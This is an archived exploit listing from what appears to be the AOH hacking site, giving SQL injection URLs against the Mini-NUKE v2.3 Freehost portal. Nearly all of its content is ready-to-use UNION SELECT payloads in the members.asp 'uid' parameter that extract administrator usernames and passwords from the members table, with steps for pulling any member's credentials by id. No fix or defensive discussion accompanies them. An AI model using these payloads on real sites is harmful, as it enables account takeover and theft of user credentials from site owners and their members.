AOH :: HP Unsorted M :: VA1068.HTM

Mini-NUKE v2.3 Freehost (tr) Multiple Remote SQL Injection Vulnerabilities



Mini-NUKE v2.3 Freehost (tr) Multiple Remote SQL Injection Vulnerabilities
Mini-NUKE v2.3 Freehost (tr) Multiple Remote SQL Injection Vulnerabilities



Exploits

admin user name : http://localhost/mininuke/members.asp?action=member_details&uid=1+union+select+0,kul_adi,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+seviye=1 

admin password : http://localhost/mininuke/members.asp?action=member_details&uid=1+union+select+0,sifre,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+seviye=1 

Learn username from id number:

http://localhost/mininuke/members.asp?action=member_details&uid=1+union+select+0,kul_adi,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+uye_id=1 

And then you can learn the same id's password like this.

http://localhost/mininuke/members.asp?action=member_details&uid=1+union+select+0,sifre,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+uye_id=1 

Script Downlad: 
http://www.aspindir.com/goster/3543 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.